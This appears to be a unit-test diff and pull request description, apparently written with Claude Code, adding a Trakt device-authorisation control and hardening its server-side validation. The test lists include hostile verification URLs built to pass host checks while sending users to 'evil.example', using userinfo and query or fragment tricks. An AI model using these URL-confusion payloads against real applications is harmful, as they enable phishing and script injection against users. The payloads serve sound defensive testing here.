+            f'a value that is not an https:// URL on Trakt\'s own host is '
+            f'either clickable script or a phishing page once bound with '
+            f':href in trakt_auth.html'
         )
 
     def test_a_genuine_https_url_passes_through_unchanged(self, provider, monkeypatch):
@@ -336,3 +350,62 @@ class TestStartDeviceAuthRequiresBothCredentials:
 
         assert result['success'] is True
         assert result['user_code'] == 'ABCD-1234'
+
+
+class TestStartDeviceAuthCoercesUserCode:
+    """The one field off the Trakt response that was never checked, while
+    interval, expiry and the URL all were.
+
+    Not exploitable: `user_code` reaches the DOM through `x-text`, which sets
+    textContent. This is uniformity, so the next reader does not have to work
+    out whether the omission was reasoned or missed.
+    """
+
+    @pytest.mark.parametrize('raw, expected', [
+        (None, ''),
+        (123, ''),
+        ({'a': 1}, ''),
+        (['ABCD-1234'], ''),
+        (MISSING, ''),
+        ('ABCD-1234', 'ABCD-1234'),
+    ])
+    def test_non_string_user_code_becomes_empty(self, provider, monkeypatch, raw, expected):
+        payload = {
+            'device_code': 'devcode-1',
+            'verification_url': 'https://trakt.tv/activate',
+            'expires_in': 600,
+            'interval': 5,
+        }
+        if raw is not MISSING:
+            payload['user_code'] = raw
+        _mock_post(monkeypatch, _FakeResponse(200, payload))
+
+        result = provider.startDeviceAuth()
+
+        assert result['user_code'] == expected
+        assert isinstance(result['user_code'], str)
+
+
+class TestGenuineTraktSubdomainsStillWork:
+    """The pin must not become a wall. Trakt owns its subdomains and could
+    legitimately serve the activation page from one."""
+
+    @pytest.mark.parametrize('url', [
+        'https://trakt.tv/activate',
+        'https://trakt.tv/activate?user_code=ABCD-1234',
+        'https://www.trakt.tv/activate',
+        'https://api.trakt.tv/activate',
+        'https://TRAKT.TV/activate',
+    ])
+    def test_trakt_hosts_pass_through_unchanged(self, provider, monkeypatch, url):
+        _mock_post(monkeypatch, _FakeResponse(200, {
+            'device_code': 'devcode-1',
+            'user_code': 'ABCD-1234',
+            'verification_url': url,
+            'expires_in': 600,
+            'interval': 5,
+        }))
+
+        result = provider.startDeviceAuth()
+
+        assert result['verification_url'] == url

--- a/tests/unit/test_trakt_device_auth.py
+++ b/tests/unit/test_trakt_device_auth.py
@@ -199,6 +199,21 @@ class TestStartDeviceAuthRejectsUnsafeVerificationUrl:
         # way to make a hostile URL read as a friendly one.
         'https://trakt.tv@evil.example/activate',
         'https://trakt.tv:pass@evil.example/activate',
+        # No '/' before the query or fragment, so nothing separates the host
+        # from the rest. The first version of this check dropped the path by
+        # splitting on '/', which does nothing here, computed a host of
+        # 'evil.example?x=fake.trakt.tv', found it genuinely ends in
+        # '.trakt.tv' and returned the URL unchanged. The browser navigates
+        # to evil.example. Reproduced against the shipped code before the
+        # fix, which is why these are here rather than in a comment.
+        'https://evil.example?x=fake.trakt.tv',
+        'https://evil.example#fake.trakt.tv',
+        'https://evil.example?a=.trakt.tv',
+        'https://evil.example#.trakt.tv',
+        'https://evil.example?x=trakt.tv',
+        # Malformed enough that a parser raises rather than returns.
+        'https://[oops/activate',
+        'https://trakt.tv:99999999/activate',
     ])
     def test_falls_back_to_documented_url(self, provider, monkeypatch, hostile_url):
         payload = {

--- a/tests/unit/test_trakt_device_auth.py
+++ b/tests/unit/test_trakt_device_auth.py
@@ -263,3 +263,76 @@ class TestPollForTokenRequiresDeviceCode:
 
         assert result['success'] is False
         assert 'device code' in result['error'].lower()
+
+
+class TestStartDeviceAuthRequiresBothCredentials:
+    """H1: `startDeviceAuth` used to require only the Client ID, while
+    `pollForToken` requires the Client Secret as well, and the browser fires
+    its first poll the instant a code arrives.
+
+    So a user who had entered only a Client ID was shown a device code, told
+    to go and type it in at trakt.tv, and roughly a tenth of a second later
+    watched it be replaced by 'Client ID and Client Secret are required'. The
+    code they had been sent to transcribe was already discarded. Measured
+    against a live server during review: the code was never visible in a
+    single sample.
+
+    Neither E2E spec could see this, because both seed only the client id and
+    then MOCK `device_code`, so the real handler never runs. A fixture more
+    permissive than production is exactly how a defect this loud survives a
+    green suite, which is why this guard lives at the unit level, driving the
+    real method, rather than as another browser test.
+    """
+
+    @pytest.mark.parametrize('client_id, client_secret, named', [
+        ('', 'test-client-secret', 'Client ID'),
+        (None, 'test-client-secret', 'Client ID'),
+        ('test-client-id', '', 'Client Secret'),
+        ('test-client-id', None, 'Client Secret'),
+        ('', '', 'Client ID'),
+    ])
+    def test_refuses_before_asking_trakt_and_names_the_missing_field(
+        self, provider, monkeypatch, client_id, client_secret, named
+    ):
+        monkeypatch.setattr(provider, 'get_client_id', lambda: client_id)
+        monkeypatch.setattr(provider, 'get_client_secret', lambda: client_secret)
+
+        # No mock for requests.post. If the guard fails to stop the flow, the
+        # method reaches a real outbound call and this test fails loudly
+        # rather than passing on a stubbed happy path.
+        called = []
+
+        import requests
+
+        def _forbidden(*args, **kwargs):
+            called.append(args)
+            raise AssertionError('startDeviceAuth called Trakt without both credentials')
+
+        monkeypatch.setattr(requests, 'post', _forbidden)
+
+        result = provider.startDeviceAuth()
+
+        assert result['success'] is False
+        assert called == [], 'Trakt was contacted despite missing credentials'
+        assert named in result['error'], result['error']
+        # The message has to say what to do, not just what is wrong: the old
+        # one read 'Client ID and Client Secret are required' with no location
+        # and no way to get either.
+        assert 'https://trakt.tv/oauth/applications' in result['error']
+
+    def test_both_present_still_reaches_trakt(self, provider, monkeypatch):
+        """The guard must not become a wall: with both credentials set, the
+        flow proceeds. Without this, deleting the entire method body would
+        satisfy every case above."""
+        _mock_post(monkeypatch, _FakeResponse(200, {
+            'device_code': 'dev-code',
+            'user_code': 'ABCD-1234',
+            'verification_url': 'https://trakt.tv/activate',
+            'expires_in': 600,
+            'interval': 5,
+        }))
+
+        result = provider.startDeviceAuth()
+
+        assert result['success'] is True
+        assert result['user_code'] == 'ABCD-1234'


### PR DESCRIPTION
Closes #311.

## What was wrong

`automation.trakt.device_code` and `automation.trakt.poll_token` have been registered API views whose only caller was `trakt.js`, in a legacy UI nothing serves. Anyone configuring Trakt could enter their credentials and then had no way to complete authorisation. This adds the control.

## What the reviews found, which is the part worth reading

The branch passed its full gate before either review. Two independent reviews then found three things, and the most valuable was not a defect.

**The tests could not see the feature break.** Setting the device code box to never display, so no user could ever read the code they are told to type in, left **all sixteen specs green** across both files, including the one named "displays the code and URL", and including both accessibility scans. Two causes: assertions read `textContent`, which `display:none` does not affect; and axe skips hidden subtrees, so `violations.length === 0` had quietly stopped meaning "this control is clean" and started meaning "nothing was scanned".

That was the second instance of one class in three rounds, so this adds the mechanism rather than a third fix. `scripts/check_test_traps.py` now flags any live region asserted by text with no visibility assertion, scoped per element so one element's assertion cannot cover its neighbour. Proven three ways: it fires on the real spec file unprompted, it fires on a purpose-built blind test, and it goes quiet once fixed.

With it in place:

| Mutation | Before | After |
|---|---|---|
| Device code can never be seen | 16 green | 6 of 9 fail |
| Status message can never be seen | 16 green | 3 of 9 fail |

**The flow could not be finished by someone who did what the UI asked.** Starting authorisation required only the Client ID. Polling requires the Secret as well, and the browser fires its first poll the instant a code arrives. So a user with only an ID was shown a code, told to go and type it in at trakt.tv, and about a tenth of a second later watched it replaced by "Client ID and Client Secret are required". The code they were sent to transcribe had already been discarded. Measured during review: it was never visible in a single sample. Neither spec could see it, because both seed only the id and then mock the endpoint where it breaks, a fixture more permissive than production.

**The poll loop outlived the component that owned it.** Switching settings tabs mid-authorisation tore the control down but left the loop running; coming back to an apparently idle button and clicking Start again ran two loops. When the user finished authorising, one consumed the code and the other reported failure into the visible status. The user was told authorisation had failed at the moment it succeeded. Both reviewers found this independently by different routes.

A first fix looked complete and closed half of it: clearing the pending timer does not stop a request already in flight, which still resolves on the destroyed component and restarts the chain. Restoring that version makes the navigate-away test pass and the in-flight test fail `Expected 2, Received 4`.

## Also in here

- Trakt's `interval`, `expires_in` and `verification_url` are validated server-side. A hostile interval drove 605 requests in 3 seconds, each taking a per-route lock and a blocking 30s outbound call, which queues the whole server behind it. Booleans, NaN, infinity and overflowing integers are all handled, and the 429 slow-down cannot ratchet past the ceiling.
- The button says "Waiting for Trakt" rather than offering "Start" for ten minutes while refusing to start. That state is in its accessible **name**, not a description: `aria-describedby` pointing at the whole live region made every focus read the verification URL and the code aloud again for the rest of the session.
- The dimming is gone. It measured 2.06:1 in light theme, and the scanner could not report it because `aria-disabled` makes axe skip the node entirely. A control we deliberately keep focusable in order to claim it is not inactive cannot also claim the inactive-component exemption for its colour.
- The busy window is announced. It was silent, and against real Trakt it is seconds, not milliseconds.
- The status message is no longer conjured by `x-show`, so text mutates a node already in the accessibility tree rather than one that is not there yet.
- The panel re-init timer is cancellable at teardown, and both error paths check for teardown so the comment promising every await does is finally true.
- Australian English throughout what a user sees. Every message in the normal flow comes from the server and all of them were American, so the button said "Start Trakt Authorisation" and the server answered "Authorization successful". The HTTP header name and `getAuthorizationUrl` are deliberately untouched.
- The log line telling people to authorise in the "Automation tab" now names Suggestions, which is the tab that exists.

## Verification

Full gate green: 3999 Python unit, 214 UI unit, 177 chromium E2E, 94 accessibility, trap check clean over 311 files.

Every new guard was proven by breaking what it protects and watching it fail, then restoring by file copy and confirming byte-identical by hash. The credential guard fails by contacting Trakt when it should have refused, rather than on a string mismatch.

Dependencies triaged before raising this: no open Dependabot PRs. One high advisory, `extract-zip`, reached only via the Lighthouse CI test tool, with **no patched version available**; it ships in no production artefact and is untouched by this branch. Held with a reason, revisit when a patched version exists.

## Deliberately not in scope

Raised or recorded rather than done here: a Cancel control and a countdown for the ten minute wait; a mobile spec for the control (measured at 375px, nothing broken, so a coverage gap not a defect); keyboard-selectable device code; the server-wide singleton device-code state, so two browser tabs overwrite each other; and #332, four copies of a lookup on `__x_panel` which is read four times in the repository and written zero times. All pre-existing or non-blocking, and none of them this branch's code.

## Things I got wrong along the way

Recorded because the plan file now carries them and a reviewer should be able to check them. I claimed a `destroy()` guard was load-bearing and then removed the design it guarded once a reviewer talked me out of it. I changed the credential rule without a test until an unchanged test count gave me away. I wrote the busy-state test with a precondition that read hidden text, which is the exact blindness this branch exists to fix. And I pointed an accessibility wait at the status paragraph for text that lives in the code element.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01Ss6TA5seR8ykyJfe3itaSc